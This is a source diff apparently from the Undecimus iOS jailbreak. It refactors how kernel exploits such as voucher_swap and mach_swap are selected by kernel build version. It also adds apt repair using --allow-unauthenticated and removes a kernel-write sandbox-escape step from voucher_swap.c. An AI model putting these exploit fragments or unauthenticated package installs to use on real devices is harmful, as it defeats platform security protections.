+    return runDpkg([@[@"-i"] arrayByAddingObjectsFromArray:debs], forceDeps, forceAll);
 }
 
 bool removePkg(char *packageID, bool forceDeps) {
-    return runDpkg(@[@"-r", @(packageID)], forceDeps);
+    return runDpkg(@[@"-r", @(packageID)], forceDeps, false);
 }
 
 bool removePkgs(NSArray <NSString*> *pkgs, bool forceDeps) {
@@ -318,7 +463,7 @@ bool removePkgs(NSArray <NSString*> *pkgs, bool forceDeps) {
         LOG("%s: Nothing to remove", __FUNCTION__);
         return false;
     }
-    return runDpkg([@[@"-r"] arrayByAddingObjectsFromArray:pkgs], forceDeps);
+    return runDpkg([@[@"-r"] arrayByAddingObjectsFromArray:pkgs], forceDeps, false);
 }
 
 bool runApt(NSArray <NSString*> *args) {
@@ -340,7 +485,7 @@ bool runApt(NSArray <NSString*> *args) {
     }
     argv[command.count] = NULL;
     int rv = runCommandv(argv[0], (int)[command count], argv, NULL);
-    return !WEXITSTATUS(rv);
+    return WIFEXITED(rv) && !WEXITSTATUS(rv);
 }
 
 bool aptUpdate() {
@@ -356,6 +501,10 @@ bool aptUpgrade() {
     return runApt(@[@"-y", @"--allow-unauthenticated", @"--allow-downgrades", @"-f", @"dist-upgrade"]);
 }
 
+bool aptRepair() {
+    return runApt(@[@"-o", @"Dir::Etc::preferences=undecimus/preferences", @"-o", @"Dir::Etc::preferencesparts=''", @"-y", @"--allow-unauthenticated", @"--allow-remove-essential", @"--allow-downgrades", @"-f", @"dist-upgrade"]);
+}
+
 bool extractAptPkgList(NSString *path, ArchiveFile* listcache, id_t owner)
 {
     struct stat buf;
@@ -375,6 +524,57 @@ bool ensureAptPkgLists() {
     return success && extractAptPkgList(@"/var/mobile/Library/Caches/com.saurik.Cydia/lists", listsArchive, 501);
 }
 
+bool removeURLFromSources(NSMutableString *sources, NSString *url)
+{
+    bool removed=false;
+    NSString *pattern = [NSString stringWithFormat:@"[^\\n](?:(?!\\n\\n).)*%@(?:(?!\\n\\n).)*\\n\\n",
+                         [url stringByReplacingOccurrencesOfString:@"." withString:@"\\."]
+                         ];
+    NSRegularExpression *sourceexp = [NSRegularExpression
+                                      regularExpressionWithPattern:pattern
+                                      options:NSRegularExpressionDotMatchesLineSeparators
+                                      error:nil];
+    
+    for (NSTextCheckingResult *source in [sourceexp matchesInString:sources options:0 range:NSMakeRange(0, sources.length)])
+    {
+        removed = true;
+        [sources deleteCharactersInRange:[source rangeAtIndex:0]];
+    }
+    return removed;
+}
+
+void deduplicateSillySources(void)
+{
+    NSString *cydia_list = [NSString stringWithContentsOfFile:@"/etc/apt/sources.list.d/cydia.list" encoding:NSUTF8StringEncoding error:nil];
+    NSMutableString *sileo_sources = [NSMutableString stringWithContentsOfFile:@"/etc/apt/sources.list.d/sileo.sources" encoding:NSUTF8StringEncoding error:nil];
+    if (cydia_list && sileo_sources) {
+        NSFileManager *fm = [NSFileManager defaultManager];
+        if (pkgIsInstalled("org.coolstar.sileo")) {
+            NSString *orig_sileo_sources = [sileo_sources copy];
+            NSRegularExpression *urlexp = [NSRegularExpression regularExpressionWithPattern:@"https?://(\\S+[^/\\s]|\\S+)/?\\s" options:0 error:nil];
+            
+            for (NSTextCheckingResult *match in [urlexp matchesInString:cydia_list options:0 range:NSMakeRange(0, cydia_list.length)])
+            {
+                NSString *url = [cydia_list substringWithRange:[match rangeAtIndex:1]];
+                if ([url hasPrefix:@"apt.thebigboss.org"] && removeURLFromSources(sileo_sources, @"repounclutter.coolstar.org")) {
+                    LOG("Removing duplicated source repounclutter from sileo.sources");
+                }
+                if (removeURLFromSources(sileo_sources, url)) {
+                    LOG("Removing duplicated source %@ from sileo.sources", url);
+                }
+            }
+            if (![sileo_sources isEqual:orig_sileo_sources]) {
+                [fm createFileAtPath:@"/etc/apt/sources.list.d/sileo.sources"
+                            contents:[sileo_sources dataUsingEncoding:NSUTF8StringEncoding]
+                          attributes:@{ NSFileOwnerAccountID:@(0), NSFileGroupOwnerAccountID:@(0), NSFilePosixPermissions:@(0644) }
+                 ];
+            }
+        } else {
+            [fm removeItemAtPath:@"/etc/apt/sources.list.d/sileo.sources" error:nil];
+        }
+    }
+}
+
 bool is_symlink(const char *filename) {
     struct stat buf;
     if (lstat(filename, &buf) != ERR_SUCCESS) {
@@ -725,150 +925,171 @@ NSString *getKernelBuildVersion() {
     return kernelBuild;
 }
 
-bool supportsExploit(exploit_t exploit) {
-#ifdef CAN_HAS_UNSUPPORTED_EXPLOIT
+bool checkDeviceSupport(device_support_info_t device_support) {
+#ifdef CAN_HAS_UNSUPPORTED_DEVICE
     return true;
-#else /* !CAN_HAS_UNSUPPORTED_EXPLOIT */
-    
-    NSString *minKernelBuildVersion = nil;
-    NSString *maxKernelBuildVersion = nil;
-    
-    switch (exploit) {
-        case multi_path_exploit: {
-            if (!multi_path_tcp_enabled()) {
-                return false;
-            }
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.52.2~8";
-            break;
-        }
-        case voucher_swap_exploit: {
-            if (get_kernel_page_size() != 0x4000) {
-                return false;
-            }
-            if (machineNameContains("iPad5,") &&
-                kCFCoreFoundationVersionNumber >= kCFCoreFoundationVersionNumber_iOS_12_0) {
-                return false;
-            }
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.240.8~8";
-            break;
-        }
-        case mach_swap_exploit: {
-            if (get_kernel_page_size() != 0x1000 &&
-                !machineNameContains("iPad5,") &&
-                !machineNameContains("iPhone8,") &&
-                !machineNameContains("iPad6,")) {
-                return false;
-            }
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.240.8~8";
-            break;
-        }
-        case mach_swap_2_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.240.8~8";
-            break;
-        }
-        case deja_xnu_exploit: {
-            if (jailbreakEnabled())
-                return false;
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.70.24~9";
-            break;
-        }
-        case empty_list_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.60.19~25";
-            break;
-        }
-        case async_wake_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.20.62~4";
-            break;
-        }
-        case necp_exploit: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4570.70.24~9";
-            break;
-        }
-        case kalloc_crash: {
-            minKernelBuildVersion = @"4397.0.0.2.4~1";
-            maxKernelBuildVersion = @"4903.252.2~2";
-            break;
-        }
-        default:
-            return false;
-            break;
-    }
-    
-    if (minKernelBuildVersion != nil && maxKernelBuildVersion != nil) {
+#else /* !CAN_HAS_UNSUPPORTED_DEVICE */
+    if (device_support.min_kernel_version != NULL && device_support.max_kernel_version != NULL) {
         NSString *kernelBuildVersion = getKernelBuildVersion();
-        if (kernelBuildVersion != nil) {
-            if ([kernelBuildVersion compare:minKernelBuildVersion options:NSNumericSearch] != NSOrderedAscending && [kernelBuildVersion compare:maxKernelBuildVersion options:NSNumericSearch] != NSOrderedDescending) {
-                return true;
-            }
+        if (kernelBuildVersion == nil) {
+            return false;
+        }
+        if ([kernelBuildVersion compare:@(device_support.min_kernel_version) options:NSNumericSearch] == NSOrderedAscending || [kernelBuildVersion compare:@(device_support.max_kernel_version) options:NSNumericSearch] == NSOrderedDescending) {
+            return false;
         }
-    } else {
-        return true;
     }
-
-    return false;
-#endif /* !CAN_HAS_UNSUPPORTED_EXPLOIT */
+    if (device_support.handler != NULL) {
+        if (!device_support.handler()) {
+            return false;
+        }
+    }
+    return true;
+#endif /* !CAN_HAS_UNSUPPORTED_DEVICE */
 }
 
 bool jailbreakSupported() {
-    return supportsExploit(empty_list_exploit) ||
-    supportsExploit(multi_path_exploit) ||
-    supportsExploit(async_wake_exploit) ||
-    supportsExploit(voucher_swap_exploit) ||
-    supportsExploit(mach_swap_exploit) ||
-    supportsExploit(mach_swap_2_exploit);
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != jailbreak_capability) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
+}
+
+bool substitutorSupported() {
+    for (size_t i = 0; substitutor_infos[i]; i++) {
+        if (!checkDeviceSupport(substitutor_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
 }
 
 bool respringSupported() {
-    return supportsExploit(deja_xnu_exploit);
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != respring_capability) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
 }
 
 bool restartSupported() {
-    return supportsExploit(necp_exploit) ||
-    supportsExploit(voucher_swap_exploit) ||
-    supportsExploit(kalloc_crash);
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != reboot_capability) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        return true;
+    }
+    return false;
 }
 
 NSInteger recommendedJailbreakSupport() {
-    if (supportsExploit(mach_swap_exploit))
-        return mach_swap_exploit;
-    else if (supportsExploit(async_wake_exploit))
-        return async_wake_exploit;
-    else if (supportsExploit(voucher_swap_exploit))
-        return voucher_swap_exploit;
-    else if (supportsExploit(mach_swap_2_exploit))
-        return mach_swap_2_exploit;
-    else if (supportsExploit(multi_path_exploit))
-        return multi_path_exploit;
-    else if (supportsExploit(empty_list_exploit))
-        return empty_list_exploit;
-    else
-        return -1;
+    NSInteger exploit = -1;
+    exploit_info_t *exploit_info = NULL;
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != jailbreak_capability
+            ) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (exploit_info == NULL) {
+            exploit_info = exploit_infos[i];
+            continue;
+        }
+        if (exploit_infos[i]->exploit_reliability > exploit_info->exploit_reliability) {
+            exploit_info = exploit_infos[i];
+        }
+    }
+    if (exploit_info != NULL) {
+        exploit = (NSInteger)exploit_info->exploit;
+    }
+    return exploit;
+}
+
+NSInteger recommendedSubstitutorSupport() {
+    NSInteger substitutor = -1;
+    substitutor_info_t *substitutor_info = NULL;
+    for (size_t i = 0; substitutor_infos[i]; i++) {
+        if (!checkDeviceSupport(substitutor_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (substitutor_info == NULL) {
+            substitutor_info = substitutor_infos[i];
+            continue;
+        }
+        if (substitutor_infos[i]->substitutor_stability > substitutor_info->substitutor_stability) {
+            substitutor_info = substitutor_infos[i];
+        }
+    }
+    if (substitutor_info != NULL) {
+        substitutor = (NSInteger)substitutor_info->substitutor;
+    }
+    return substitutor;
 }
 
 NSInteger recommendedRestartSupport() {
-    if (supportsExploit(necp_exploit))
-        return necp_exploit;
-    else if (supportsExploit(voucher_swap_exploit))
-        return voucher_swap_exploit;
-    else if (supportsExploit(kalloc_crash))
-        return kalloc_crash;
-    else
-        return -1;
+    NSInteger exploit = -1;
+    exploit_info_t *exploit_info = NULL;
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != reboot_capability
+            ) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (exploit_info == NULL) {
+            exploit_info = exploit_infos[i];
+            continue;
+        }
+        if (exploit_infos[i]->exploit_reliability > exploit_info->exploit_reliability) {
+            exploit_info = exploit_infos[i];
+        }
+    }
+    if (exploit_info != NULL) {
+        exploit = (NSInteger)exploit_info->exploit;
+    }
+    return exploit;
 }
 
 NSInteger recommendedRespringSupport() {
-    if (supportsExploit(deja_xnu_exploit))
-        return deja_xnu_exploit;
-    else
-        return -1;
+    NSInteger exploit = -1;
+    exploit_info_t *exploit_info = NULL;
+    for (size_t i = 0; exploit_infos[i]; i++) {
+        if (exploit_infos[i]->exploit_capability != respring_capability
+            ) {
+            continue;
+        }
+        if (!checkDeviceSupport(exploit_infos[i]->device_support_info)) {
+            continue;
+        }
+        if (exploit_info == NULL) {
+            exploit_info = exploit_infos[i];
+            continue;
+        }
+        if (exploit_infos[i]->exploit_reliability > exploit_info->exploit_reliability) {
+            exploit_info = exploit_infos[i];
+        }
+    }
+    if (exploit_info != NULL) {
+        exploit = (NSInteger)exploit_info->exploit;
+    }
+    return exploit;
 }
 
 bool daemonIsLoaded(char *daemonID) {
@@ -1024,12 +1245,17 @@ bool verifyECID(NSString *ecid) {
 bool canOpen(const char *URL) {
     __block bool canOpenURL = false;
     dispatch_semaphore_t semaphore = dispatch_semaphore_create(0);
-    dispatch_async(dispatch_get_main_queue(), ^{
+    dispatch_block_t block = ^{
         if ([[UIApplication sharedApplication] canOpenURL:[NSURL URLWithString:@(URL)]]) {
             canOpenURL = true;
         }
         dispatch_semaphore_signal(semaphore);
-    });
+    };
+    if ([[NSThread currentThread] isMainThread]) {
+        block();
+    } else {
+        dispatch_async(dispatch_get_main_queue(), block);
+    }
     dispatch_semaphore_wait(semaphore, DISPATCH_TIME_FOREVER);
     return canOpenURL;
 }
@@ -1216,8 +1442,8 @@ out:
 }
 
 int waitForFile(const char *filename) {
-    auto rv = access(filename, F_OK);
-    for (auto i = 0; !(i >= 100 || rv == ERR_SUCCESS); i++) {
+    int rv = access(filename, F_OK);
+    for (int i = 0; !(i >= 100 || rv == ERR_SUCCESS); i++) {
         usleep(100000);
         rv = access(filename, F_OK);
     }
@@ -1229,56 +1455,92 @@ NSString *hexFromInt(NSInteger val) {
 }
 
 void waitFor(int seconds) {
-    for (auto i = 1; i <= seconds; i++) {
+    for (int i = 1; i <= seconds; i++) {
         LOG("Waiting (%d/%d)", i, seconds);
         sleep(1);
     }
 }
 
-void blockDomainWithName(const char *name) {
-    id hostsFile = nil;
-    id newLine = nil;
-    id newHostsFile = nil;
-    hostsFile = [NSString stringWithContentsOfFile:@"/etc/hosts" encoding:NSUTF8StringEncoding error:nil];
-    newHostsFile = hostsFile;
-    newLine = [NSString stringWithFormat:@"\n127.0.0.1 %s\n", name];
-    if (![hostsFile containsString:newLine]) {
-        newHostsFile = [newHostsFile stringByAppendingString:newLine];
+bool blockDomainWithName(const char *name) {
+    if (!unblockDomainWithName(name)) {
+        LOG("%s: Unable to clean hosts file", __FUNCTION__);
+        return false;
     }
-    newLine = [NSString stringWithFormat:@"\n::1 %s\n", name];
-    if (![hostsFile containsString:newLine]) {
-        newHostsFile = [newHostsFile stringByAppendingString:newLine];
+    NSString *domain = @(name);
+    NSString *hosts_file = @"/etc/hosts";
+    NSString *hosts = [NSString stringWithContentsOfFile:hosts_file encoding:NSUTF8StringEncoding error:nil];
+    if (hosts == nil) {
+        LOG("%s: Unable to read hosts file", __FUNCTION__);
+        return false;
     }
-    if (![newHostsFile isEqual:hostsFile]) {
-        [newHostsFile writeToFile:@"/etc/hosts" atomically:YES encoding:NSUTF8StringEncoding error:nil];
+    NSArray *redirects = @[@"127.0.0.1", @"n::1"];
+    for (NSString *redirect in redirects) {
+        NSString *line = [NSString stringWithFormat:@"\n%@\t%@\n", redirect, domain];
+        hosts = [hosts stringByAppendingString:line];
     }
+    if (![hosts writeToFile:hosts_file atomically:YES encoding:NSUTF8StringEncoding error:nil]) {
+        LOG("%s: Unable to update hosts file", __FUNCTION__);
+        return false;
+    }
+    return true;
 }
 
-void unblockDomainWithName(const char *name) {
-    id hostsFile = nil;
-    id newLine = nil;
-    id newHostsFile = nil;
-    hostsFile = [NSString stringWithContentsOfFile:@"/etc/hosts" encoding:NSUTF8StringEncoding error:nil];
-    newHostsFile = hostsFile;
-    newLine = [NSString stringWithFormat:@"\n127.0.0.1 %s\n", name];
-    if ([hostsFile containsString:newLine]) {
-        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+bool unblockDomainWithName(const char *name) {
+    NSString *domain = @(name);
+    NSString *hosts_file = @"/etc/hosts";
+    NSString *hosts = [NSString stringWithContentsOfFile:hosts_file encoding:NSUTF8StringEncoding error:nil];
+    if (hosts == nil) {
+        LOG("%s: Unable to read hosts file", __FUNCTION__);
+        return false;
     }
-    newLine = [NSString stringWithFormat:@"\n0.0.0.0 %s\n", name];
-    if ([hostsFile containsString:newLine]) {
-        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+    for (NSString *line in [hosts componentsSeparatedByCharactersInSet:[NSCharacterSet newlineCharacterSet]]) {
+        for (NSString *string in [line componentsSeparatedByCharactersInSet:[NSCharacterSet whitespaceCharacterSet]]) {
+            if ([string isEqualToString:domain]) {
+                hosts = [hosts stringByReplacingOccurrencesOfString:line withString:@""];
+            }
+        }
     }
-    newLine = [NSString stringWithFormat:@"\n0.0.0.0    %s\n", name];
-    if ([hostsFile containsString:newLine]) {
-        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+    if (![hosts writeToFile:hosts_file atomically:YES encoding:NSUTF8StringEncoding error:nil]) {
+        LOG("%s: Unable to update hosts file", __FUNCTION__);
+        return false;
     }
-    newLine = [NSString stringWithFormat:@"\n::1 %s\n", name];
-    if ([hostsFile containsString:newLine]) {
-        newHostsFile = [hostsFile stringByReplacingOccurrencesOfString:newLine withString:@""];
+    return true;
+}
+
+bool cydiaIsInstalled() {
+    if (access("/Applications/Cydia.app", F_OK) != ERR_SUCCESS) {
+        return false;
     }
-    if (![newHostsFile isEqual:hostsFile]) {
-        [newHostsFile writeToFile:@"/etc/hosts" atomically:YES encoding:NSUTF8StringEncoding error:nil];
+    if (!canOpen("cydia://")) {
+        return false;
     }
+    return true;
+}
+
+NSString *localize(NSString *str, ...) {
+    va_list ap;
+    va_start(ap, str);
+    NSString *str_to_localize = [[NSString alloc] initWithFormat:str arguments:ap];
+    va_end(ap);
+    return NSLocalizedString(str_to_localize, @"");
+}
+
+exploit_info_t *get_exploit_info(exploit_t exploit) {
+    for (size_t i = 0; exploit_infos[i]; ++i) {
+        if (exploit_infos[i]->exploit == exploit) {
+            return exploit_infos[i];
+        }
+    }
+    return NULL;
+}
+
+substitutor_info_t *get_substitutor_info(substitutor_t substitutor) {
+    for (size_t i = 0; substitutor_infos[i]; ++i) {
+        if (substitutor_infos[i]->substitutor == substitutor) {
+            return substitutor_infos[i];
+        }
+    }
+    return NULL;
 }
 
 __attribute__((constructor))

Undecimus/source/voucher_swap.c

@@ -1142,11 +1142,9 @@ voucher_swap() {
 	SafeFreeNULL(pipe_buffer);
 	mach_port_destroy(mach_task_self(), base_port);
     
-    // 30. Unsandbox
-    uint64_t selfproc = kernel_read64(current_task + OFFSET(task, bsd_info));
-    uint64_t ucred = kernel_read64(selfproc + OFFSET(proc, p_ucred));
-    uint64_t cr_label = kernel_read64(ucred + 0x78);
-    kernel_write64(cr_label + 0x10, 0);
+    // 30. Cache our proc_t address
+    extern uint64_t cached_proc_struct_addr;
+    cached_proc_struct_addr = kernel_read64(current_task + OFFSET(task, bsd_info));
 
 	// And that's it! Enjoy kernel read/write via kernel_task_port.
 	INFO("done! port 0x%x is tfp0", kernel_task_port);

Update.txt

@@ -1 +1 @@
-2.1.1
+3.2.0